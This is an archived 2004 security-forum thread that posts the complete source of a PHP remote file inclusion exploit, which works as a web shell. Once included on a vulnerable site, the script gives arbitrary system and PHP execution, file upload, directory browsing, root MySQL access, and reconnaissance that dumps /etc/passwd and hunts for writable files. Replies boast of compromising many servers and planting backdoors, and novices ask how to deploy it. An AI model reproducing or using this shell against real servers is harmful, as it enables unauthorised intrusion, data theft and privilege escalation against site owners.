Php Include Vulnerability Exploit (explorer V1.4)

Full Version: Php Include Vulnerability Exploit (explorer V1.4)

GovernmentSecurity.org > The Archives > Exploit Articles

GaLiaRePt

Feb 1 2004, 09:49 PM

PHP include vulnerability exploit (EXPLORER v1.4)
Date: 2004-02-01

Author : Nourredine Himeur <lostnoobs@security-challenge.com>
Download : http://www.security-corporation.com/downlo...xplorerv1_4.txt

CODE

<?

$site="http://membres.lycos.fr/newbie2323/explorerv1_5.txt"; // Where this exploit is located. e.g.: www.dumbman.com/lolage/file.txt but it can be called by an unexplicit file url or file extension. Modify it as necessary

if(!$variable){
$variable="page"; // Inclusion variable from the vulnerable site. E.g. : http://vulnerable_site/wall.php?page=index.htm, here the page is the variable used for inclusion. Modify it as necessary.
}

/* EXPLORER v1.4 - Modified - GET THE ROOT ! THIS IS A PRIVATE VERSION

------------------------

PHP include vulnerability exploit for exploring purposes... Hum, no, sorry. For TESTING pruposes ONLY.

Version : 1.4 - Modified version
Original version by : LostNoobs, www.security-challenge.com
Modified by : Clad Strife

France

------------------------

This exploit allows you to :

- Browse the server Hard Disk
- Upload files on the server
- Execute Unix or DOS commands
- Execute PHP

What is new with this modified version :

- Scan for non-protected files or repertories on which you could write. Only for UNIX type servers.
- MySQL communication interface.
- Usual UNIX system commands interface to make easier a system overview
- Exploit rewritten in english
- Exploit has a better look and feel

To come :

- Backdoor creation on the server
- Scan of vulnerable files with include vulnerability

------ README :

E.g. :

http://www.vulnerable_site.com/wall.php?page=http://www.mysite.com/explorer.txt

More :

http://www.vulnerable_site.com is the vulnerable site

http://www.site_faillible.com/include.php?page=variable is the webpage from where the include function is. If include.php contains a include($page.".txt"); that means it includes only files finishing by the .txt extension, so you have to rename your file consequently.

http://www.mysite.com this is your site

http://www.mysite.com/explorer.txt (or any other extension) The address where this exploit is located.

You have to modify the script to make it work properly.

Now your script should be ready for action. Try it by using : http://www.vulnerable_site.com/wall.php?page=http://www.mysite.com/explorer.txt

*/

$view_readme = 1; // Set to 1 if you checked the readme.
if($view_readme == 0)
{
printf("<b>You should look at the README written inside this exploit if you want to unlock it !</b>");
exit;
}

# Here the exploit code begins !

echo(' <a href="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=upload&variable='.$variable.'" > Upload a file.</a><br><br> ');

echo(' <a href="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=explfopen&variable='.$variable.'" > Explore with fopen() function.</a><br><br>');

echo(' <a href="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=execphp&variable='.$variable.'" > Execute arbitrary PHP functions.</a><br><br>');

if(system("echo '<font color=red >PHP system() function is working properly. The following features should work :</font>'"))
{
echo(' <br><br><a href="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=system&variable='.$variable.'" > Execute a system() command.</a><br><br>');

echo(' <a href="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=execsql&variable='.$variable.'">
Manager for SQL Server</a><br><br>');

echo(' <a href="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=overview&variable='.$variable.'">System overviewer (get the root !)</a><br><br>');
}

echo('<font size=-2>Include Exploit v1.4 - modified<br>Original authors : LostNoobs.<br>Modified by : Clad Strife.</font>');

###
#
# (New feature) SQL Manager
#
###

if($option=="execsql")
{

// A little about this feature.

echo("

<FORM ENCTYPE=\"multipart/form-data\" ACTION=\"".$PHP_SELF."?".$variable."=".$site."&option=execsql&variable=".$variable."\" METHOD=POST><hr><br><br>

From here you can try to manage a local or remote mysqld server. If you have some logins and pass to try on the SQL Server, then you can start from here.<bR><br>

In fact you could also use system() to exec the local mysql client, but the command line is getting too large and not easily rewritable by this way. This is why I made this query manager.<br><br>

<b>You need to have valid username/password to get into a local or remote database. To remote one you could be filtered, so don't get nervous about connection errors. Notice that this feature doesn't use the common mysql PHP functions, because the vulnerable page on which you make this exploit be browsable could crate some problems. It uses the common mysql client on *nix systems. The delay execution time of the client should be short enough to don't be discovered.</b>
");

// Here starts the manager :

echo("
<br><br><hr><br><br>

Enter the name of the mysql client binary (default : mysql):<br>
<input name=\"sql_client\" type=\"text\" value=\"mysql\">

<br><br>Enter the login (default : root, but you can change it):<br>
<input name=\"sql_login\" type=\"text\" value=\"root\">

<br><br>Enter the password (\"none\" is only if no password is needed): <br>
<input name=\"sql_password\" type=\"text\" value=\"none\">

<br><br>Enter address of target. \"localhost\" is maybe what you are searching for. Check for 127.0.0.1 if it doesn't work. Enter a valid IP address or hostname for remote connection :<br>
<input name=\"sql_host\" type=\"text\" value=\"Provide a target\">

<bR><br>Enter any other facultative options for mysql client. This feature is only designed to set more sql client options. E.g. : if you want to connect on a specific port you will have to write : \"--port=3306\". If you are unusure of what to do, leave it blank :<br>
<input name=\"sql_options\" type=\"text\" value=\"\">

<br><br>Enter valid SQL queries. You can try \"SHOW DATABASES;\" first (default) and then exec command as \"USE BASE1; SHOW TABLES;\". You can edit on multiple lines :<br>
<TEXTAREA input name=\"sql_query\" ROWS=10 COLS=35>SHOW DATABASES;
# USE database_name; SHOW TABLES;
# SELECT * FROM table_name;</TEXTAREA>

<br><br><input name=\"submit\" type=\"submit\" value=\"Send !\">
<br><br><hr>
</font></form>

");
}

if($sql_client)
{
if ($sql_host == "Provide a target") // This checks that a target is set
{
echo("Please provide a valid target."); // No target is set
}
else if($sql_password == "none") // Ok for target, processing if no password is set
{
$sql_exec_option = "--execute=\"$sql_query\"";
$system_cmd="$sql_client --user=$sql_login --host=$sql_host $sql_options $sql_exec_option";
$system_cmd=str_replace("\\\"","\"",$system_cmd);
$system_cmd=str_replace("\\'","'",$system_cmd);
echo("<br><br>Results for query : <b>$system_cmd</b> :<br><br><TEXTAREA COLS=100 ROWS=40>\"SQL query \"$sql_query\" results :
------------------------------------------------------------

");
system($system_cmd,$var);
if($var != 0){
system($system_cmd . " 1> /tmp/.output.txt 2>&1; cat /tmp/.output.txt rm /tmp/.output.txt"); } // print the error if there is one
echo("</TEXTAREA>");
} // End of else if for no password option

else // processing when target is ok and when a password is provided
{
$sql_exec_option = "--execute=\"$sql_query\"";
$system_cmd="$sql_client --user=$sql_login --password=$sql_password --host=$sql_host $sql_options $sql_exec_option";
$system_cmd=str_replace("\\\"","\"",$system_cmd);
$system_cmd=str_replace("\\'","'",$system_cmd);
echo("<br><br>Results for query : <b>$system_cmd</b> :<br><br><TEXTAREA COLS=100 ROWS=40>\"SQL query \"$sql_query\" results :
------------------------------------------------------------

");
system($system_cmd,$var);
if($var != 0){
system($system_cmd . " 1> /tmp/.output.txt 2>&1; cat /tmp/.output.txt rm /tmp/.output.txt"); } // print the error if there is one
echo("</TEXTAREA>");
} // end of else

} // end of if

###
#
# (New feature) System overview utility
#
###

if($option=="overview")
{

echo('<br><br><hr><br>From here you will be able to execute many predefined commands which gather informations about the system itself. This has been designed to make an easier way to catch the root account. <b>GET THE ROOT ! Wh00h00 !!</b><br><br>More you choose commands to be executed, more you have to expect a long loading time. Do not be worry if the webpage is still hanging. Anyway some specific UNIX commands may not work properly, because the command options in this file are designed for GNU/LINUX systems.<br><br><hr><br><br>');

echo('

<FORM ENCTYPE="multipart/form-data" ACTION="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=overview&variable='.$variable.'" METHOD=POST>
<i>About processes :</i><br>
<INPUT TYPE="checkbox" name="procroot" VALUE="y"> What the are the processes executed by the root ?<br>
<INPUT TYPE="checkbox" name="procall" VALUE="y"> What are all running processes ?<br><br><br>

<i>About the system :</i><br>
<INPUT TYPE="checkbox" name="uname" VALUE="y"> Print certain system information.<br>
<INPUT TYPE="checkbox" name="catversion" VALUE="y"> What is the kernel version ?<br>

<INPUT TYPE="checkbox" name="mount" VALUE="y"> Where are the mounted filesystems ?<br>
<INPUT TYPE="checkbox" name="id" VALUE="y"> Which user is running this httpd server ?<br>
<INPUT TYPE="checkbox" name="who" VALUE="y"> Who is currently connected to the system ?<br>
<INPUT TYPE="checkbox" name="last" VALUE="y"> Give me the logins and hostnames of all last connected users.<br>
<INPUT TYPE="checkbox" name="modules" VALUE="y"> What are the running modules ?<br>
<INPUT TYPE="checkbox" name="hardware" VALUE="y"> Collect about Hardware (is it really useful ?)<br>
<INPUT TYPE="checkbox" name="network" VALUE="y"> Extract the network configuration<br>

<br><i>Collect data in files :</i><br>

<INPUT TYPE="radio" name="passwd" value="yfull"> Get all the /etc/passwd.<br>
<INPUT TYPE="radio" name="passwd" value="yshell"> Grab only users with a shell access.<br>
<INPUT TYPE="checkbox" name="group" value="y"> What are the available groups ?<br>
<INPUT TYPE="checkbox" name="resolv" value="y"> What are the DNS used by this server ?<br><br>

<i>Miscellaneous :</i><br>
<INPUT TYPE="radio" name="bcheck" value="big"> BIG CHECK<br>
It checks for non write-protected files. This feature may slow the page loading, and sometimes so much that it is not possible to continue. Try for the small check first before trying this one.<br>
<INPUT TYPE="radio" name="bcheck" value="small"> SMALL CHECK<br>
It checks for non-write protected files in /tmp and /home only. May not be exhaustive.<br>

<INPUT TYPE="checkbox" name="dirs" value="y"> + DIRECTORIES<br>
This checks for non-protected directories. This feature will only be used with a SMALL or BIG CHECK. Anyway it increases the global search time.<br><br>
<INPUT TYPE="submit" name="Submit" Value="Nuke !"></form><br><br><hr>');

if($Submit)
{
echo ('<br><TEXTAREA COLS=110 ROWS=40>Text output for all selected options. First you got the command processed, and next you read its output.
----------------------------------------------------------------------------->

');

// Here will start the output for each selected command.

///////////////////
if($procroot)
{
echo('

Processes launched by the root :
ps aux | grep root
--------------------------------

');
system("ps aux | grep root",$var);
if($var != 0){
echo("failed");}

}
//////////////////

//////////////////
if($procall)
{
echo('

Processes currently running :
ps aux
-----------------------------

');
system("ps aux",$var);
if($var != 0){
echo("failed");}
//////////////////
}

//////////////////
if($uname)
{
echo('

Certain system information :
uname -a
----------------------------

');
system("uname -a",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($catversion)
{
echo('

Kernel version :
cat /proc/version
-----------------

');
system("cat /proc/version",$var);
if($var != 0){
echo("failed");}
}
/////////////////

/////////////////
if($mount)
{
echo('

Show the mounted partitions :
mount
-----------------------------

');
system("mount",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($id)
{
echo('

Which user is running this server :
id
-----------------------------------

');
system("id",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($who)
{
echo('

Who is connected :
who
------------------

');
system("who",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($last)
{
echo('

Who are the last connected users :
last -a
----------------------------------

');
system("last -a",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($modules)
{
echo('

Running modules :
cat /proc/modules
-----------------

');
system("cat /proc/modules",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($hardware)
{
echo('

About Hardware :
cat /proc/cpuinfo
-----------------

');
system("cat /proc/cpuinfo",$var);
if($var != 0){
echo("failed");}

echo('

About Hardware :
cat /proc/pci
----------------

');
system("cat /proc/pci",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($network)
{
echo('

Network configuration :
ifconfig -a
-----------------------

');
system("ifconfig -a",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($passwd == "yfull")
{
echo('

Whole /etc/passwd :
cat /etc/passwd
-------------------

');
system("cat /etc/passwd",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($passwd == "yshell")
{
echo('

Current account with a shell :
cat /etc/passwd | grep /bin/sh;
cat /etc/passwd | grep /bin/bash;
cat /etc/passwd | grep /bin/tcsh;
----------------------------------

');
system("cat /etc/passwd | grep /bin/sh; cat /etc/passwd | grep /bin/bash; cat /etc/passwd | grep /bin/tcsh;true",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($passwd == "yfull")
{
echo('

Full /etc/passwd :
cat /etc/passwd
-----------------

');
system("cat /etc/passwd",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($group)
{
echo('

Current groups :
cat /etc/group
-----------------

');
system("cat /etc/group",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($resolv)
{
echo('

DNS used for resolution :
cat /etc/resolv.conf
-------------------------

');
system("cat /etc/resolv.conf",$var);
if($var != 0){
echo("failed");}
}
//////////////////

/////////////////
if($bcheck == "big")
{
echo('

Non-protected files on the whole system :
find / -type f -perm 777
-----------------------------------------

');
system("find / -type f -perm 777",$var);
if($var != 0){
echo("failed");}

if($dirs) //may also check for non protected directories
{
echo('

Non-protected directories on the whole system :
find / -type d -perm 777
-----------------------------------------------

');
system("find / -type d -perm 777",$var);
if($var != 0){
echo("failed");}
}
}
//////////////////

/////////////////
if($bcheck == "small")
{

echo('

Non-protected files on /tmp and /home :
find /home -type f -perm 777;
find /tmp -type f -perm 777
---------------------------------------

');
system("find /home -type f -perm 777; find /tmp -type f -perm 777",$var);
if($var != 0){
echo("failed");}

if($dirs) //may also check for non protected directories
{
echo('

Non-protected directories on /home and /tmp :
find /home -type d -perm 777;
find /home -type d -perm 777
---------------------------------------------

');
system("find /home -type d -perm 777; find /tmp -type d -perm 777",$var);
if($var != 0){
echo("failed");}
}

}
//////////////////

echo('

End of report.
</TEXTAREA><br>');
} // end of if($Submit)
} // end of if option = overview

###
#
# PHP Execution part ------------------------
#
###

if($option=="execphp"){

echo("

<FORM ENCTYPE=\"multipart/form-data\" ACTION=\"".$PHP_SELF."?".$variable."=".$site."&option=execphp&variable=".$variable."\" METHOD=POST><hr><br><br>

Edit PHP code to execute. (e.g.: phpinfo(); echo(\"toto\"); ):<br>
<TEXTAREA input name=\"cmd0\" ROWS=15 COLS=50></TEXTAREA>
<br><br>
<input type=\"SUBMIT\" value=\"Execute !\" name=\"SUBMIT\">

</font>

</form>

");

if($cmd0){
$cmd0=str_replace("\\\"","\"",$cmd0);
$cmd0=str_replace("\\'","'",$cmd0);
echo("<br><br><hr><br><br>\"$cmd0\" results :<br><br>");
eval($cmd0);
echo("<br><br><hr><br><br>");
}
}

###
#
# System command part -----------------
#
###

if($option=="system"){

echo("

<FORM ENCTYPE=\"multipart/form-data\" ACTION=\"".$PHP_SELF."?".$variable."=".$site."&option=system&variable=".$variable."\" METHOD=POST><hr><br><bR>

Choose a system command to execute with system() function :
<br>
<input name=\"cmd\" type=\"text\" value=\"\" size=40>
<br>
<br>
<input type=\"SUBMIT\" value=\"Execute !\" name=\"SUBMIT\">
</font>

</form>

");

if($cmd){
$cmd=str_replace("\\\"","\"",$cmd);
$cmd=str_replace("\\'","'",$cmd);
echo("<br><br><hr><br><br>Results for command <b>$cmd</b> :<br><br>");
echo "<form><textarea cols=100 rows=40>\"$cmd\" results :
-----------------------------------------

";

system($cmd,$var); // Output command in the textarea
if($var != 0){
system($cmd . " 1> /tmp/.output.txt 2>&1; cat /tmp/.output.txt rm /tmp/.output.txt"); } // print the error if there is one

echo "</textarea></form>";
}
echo("<br><br><hr><br><br><br>");
}

###
#
# Upload part ------------------
#
###

if($option=="upload"){

echo("

<FORM ENCTYPE=\"multipart/form-data\" ACTION=\"".$PHP_SELF."?".$variable."=".$site."&option=upload&variable=".$variable."\" METHOD=POST><hr><br><br>

Choose the file on your computer that you want to upload :<br>
<input name=\"FileName\" type=\"FILE\" value=\"\" size=70>
<br><br>
Choose the remote location where you want the file to be stored. Provide a path ending with the file name (e.g. : /tmp/.myfile) :<br>
<input name=\"path\" type=\"text\" value=\"\" size=70>
<br>
<br>
<input type=\"SUBMIT\" value=\"Upload it !\" name=\"SUBMIT\">

</font>

</form>

");

if($FileName){

if ( !copy($FileName, $path)){

print("<br><br><hr><br><br>The upload of $FileName in $path failed...<br>\n");

}else{

echo("<br><br><hr><br><br>Upload Successfull !");

}
}
}

###
#
# Explorer part --------------------
#
###

if($option=="explfopen"){

function output( $mode )

{

if( $mode & 0x1000 )

$type='p'; /* FIFO pipe */

else if( $mode & 0x2000 )

$type='c'; /* Character special */

else if( $mode & 0x4000 )

$type='d'; /* Directory */

else if( $mode & 0x6000 )

$type='b'; /* Block special */

else if( $mode & 0x8000 )

$type='-'; /* Regular */

else if( $mode & 0xA000 )

$type='l'; /* Symbolic Link */

else if( $mode & 0xC000 )

$type='s'; /* Socket */

else

$type='u'; /* UNKNOWN */

/* Determine permissions */

$owner["read"] = ($mode & 00400) ? 'r' : '-';

$owner["write"] = ($mode & 00200) ? 'w' : '-';

$owner["execute"] = ($mode & 00100) ? 'x' : '-';

$group["read"] = ($mode & 00040) ? 'r' : '-';

$group["write"] = ($mode & 00020) ? 'w' : '-';

$group["execute"] = ($mode & 00010) ? 'x' : '-';

$world["read"] = ($mode & 00004) ? 'r' : '-';

$world["write"] = ($mode & 00002) ? 'w' : '-';

$world["execute"] = ($mode & 00001) ? 'x' : '-';

/* Adjust for SUID, SGID and sticky bit */

if( $mode & 0x800 )

$owner["execute"] = ($owner[execute]=='x') ? 's' : 'S';

if( $mode & 0x400 )

$group["execute"] = ($group[execute]=='x') ? 's' : 'S';

if( $mode & 0x200 )

$world["execute"] = ($world[execute]=='x') ? 't' : 'T';

printf("%1s", $type);

printf("%1s%1s%1s", $owner[read], $owner[write], $owner[execute]);

printf("%1s%1s%1s", $group[read], $group[write], $group[execute]);

printf("%1s%1s%1s\n", $world[read], $world[write], $world[execute]);

}

if($fichier)

{

echo "<form><textarea cols=100 rows=40>";
$fp = fopen ($rep."/".$fichier, "r");
$i=1;
while (!feof($fp))

{

$buffer=fgets($fp,4096);
$buffer=str_replace(chr(10),"",$buffer);
$buffer=str_replace(chr(13),"",$buffer);
echo $buffer."\n";

}

fclose ($fp);
echo "</textarea></form>";

}

else {

if(!$rep)

$rep="./"; // initial path location

echo("<br><br><hr><br><br>");

if($rep == "./../../../../../../../../../../../../")
{
echo("<b>You are in the root FileSystem.</b><br><br>");
}

$directory = opendir($rep);

while ($entree = readdir($directory)) {

if ($entree != "." && $entree != "..")

$tFichiers[] = filemtime($rep.$entree)."€".$entree."€".is_file($rep.$entree)."€".fileowner($rep.$entree);

}

closedir($directory);

rsort($tFichiers);

for ($cpt = 0; $cpt < sizeof($tFichiers); $cpt++) {

$tVals = explode("€", $tFichiers[$cpt]);

if($tVals[2]==0)

{

$link=$rep.$tVals[1]."/";

echo "[".date("Y-m-d H:i",$tVals[0])."] <B><a href=$PHP_SELF?".$variable."=".$site."&rep=".$link."&option=explfopen&variable=".$variable.">".$tVals[1]."</a></B><BR>\n";

}

else{

$link=$rep."&fichier=".$tVals[1];

output(fileperms($rep.$entree));

echo "[".date("Y-m-d H:i",$tVals[0])."] <B><a href=$PHP_SELF?".$variable."=".$site."&rep=".$link."&option=explfopen&variable=".$variable.">".$tVals[1]."</a></B> $tVals[3]<BR>\n"; }

}
}
}

?>

ni3_boom

Feb 1 2004, 09:53 PM

nice job man
but i gont error whil CPl
can any body help me ?

x1`

Feb 1 2004, 10:23 PM

how do we use this then , cause its not for windows so it dosent compile
any instructions

phaeton

Feb 1 2004, 10:30 PM

Sigh guys cmon, what are you doing on a board like this if you can't tell languages apart? Thats a PHP script... try to read up on the matter before you ask questions. (and yes, its for linux)

brOmstar

Feb 1 2004, 11:06 PM

lol how to compile u r so funny =)

this is only a php-script which u can use to explore a system where is it possible to include remote php-files...

ps:
what can u do with that i'm a windows dummie ..more or less =(
is it possible to start an service at such a server by upload a compiler + sourcecode and then run this ?

nulladd

Feb 2 2004, 05:17 AM

how to compile
whahahahhhahhaahahaha

sorry, ill stop now

yuliang11

Feb 2 2004, 05:28 AM

get error while compiling?? u guys know what's a script? go and do some homework.. kiddies

Brt

Feb 2 2004, 10:03 AM

thanks for your work
I wants it also times to test

Alien

Feb 2 2004, 11:07 AM

hehehe compile

??

no comments

LOL

phaeton

Feb 2 2004, 01:46 PM

If you want to adapt it to windows it would not take much, just replace some of the built in commands and their paths etc etc for windows commands, as far as I see this isn't platform dependent, and the exploit is actually quite simple.

extreme

Feb 2 2004, 01:56 PM

Oh, this stuff is so great.. I got so many servers with this one so far..

Serhat

Feb 2 2004, 03:48 PM

I just tried it out,, I can execute all the command only @ the account of mine etc

Still a nice one

vnet576

Feb 2 2004, 04:07 PM

QUOTE (yuliang11 @ Feb 2 2004, 12:28 AM)

get error while compiling?? u guys know what's a script? go and do some homework.. kiddies

Rofl...I can only imagine them plugging this script into Visual C++ or dev-cpp and wondering why it won't compile.

mrBob

Feb 2 2004, 07:06 PM

lol
i know we've all been (or are) noobs... but soooooooo noob? nah

how to compile a php script... pff

well, i just had to reply on this

Kynroxes

Feb 2 2004, 09:06 PM

Yes I read it yesterday, it's a great text.

Yorn

Feb 3 2004, 03:11 AM

I wonder why they call them script kiddies when they only use .c code and compile it anymore. They can't even get PERL and PHP to work right so you can't exactly call them script kiddies. Hell, the guys like myself that know both are script GODS compared to these guys.

Trojan^kid

Feb 3 2004, 03:41 AM

thanx GaLiaRePt 4 the exploit
and i have compiled the exploit

cheers

yuliang11

Feb 3 2004, 09:12 AM

compiled it nicely? well becareful with the terms used. there are differences between compiler, interpreter and assembler.

nihoho

Feb 4 2004, 09:35 PM

QUOTE (yuliang11 @ Feb 3 2004, 09:12 AM)

compiled it nicely? well becareful with the terms used. there are differences between compiler, interpreter and assembler.

Heh.. well, semantically speaking, one CAN compile a PHP exploit..

A piece of code from here, a piece of code from there and you can compile (verb: Put together out of existing material. Reference: WordWeb) an exploit, even in PHP.. Just a hunch but I think this method is used more often than not..

Anyway this is my first post here, and I'd like to start by thanking whoever mantains this forum for keeping it open and straightforward.. Lots of good info here.. Big thanks to the contributors also..

Regarding this exploit, can anyone please share a link to the original advisory?

Thanks.

ArchAngel

Feb 5 2004, 09:13 PM

its funny that people cant understand the simple sign thats its a php script

QUOTE

at the top line should give it away

migo

Feb 26 2004, 12:16 PM

guys what is wall.php
could anyone plz tell me how to include this script on any linuz server
i just anyone give a working example of the first line of code that should be changed

flashb4ck

Feb 26 2004, 12:54 PM

this script rulez :=)
a friend say that i never can hack his freebsd but he use apache / php an so on perhabs i can now inject him with my backdoors LÖÖÖÖL

gr€€tZ fl4Shb4Ck

migo

Feb 26 2004, 01:15 PM

QUOTE

this script rulez :=)
a friend say that i never can hack his freebsd but he use apache / php an so on perhabs i can now inject him with my backdoors LÖÖÖÖL

could you plz give little explanation on how you configuered this script to run ?

Bst Regards
migo

migo

Mar 7 2004, 05:11 PM

let me refine what i say
i wanna just know how can include this script from the remote server?
i modify all the settings in the php file itself
now how can i include this file ?
from where to all it i mean from the remote server?

mysoulmustfly

Mar 9 2004, 10:45 AM

thx alot

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.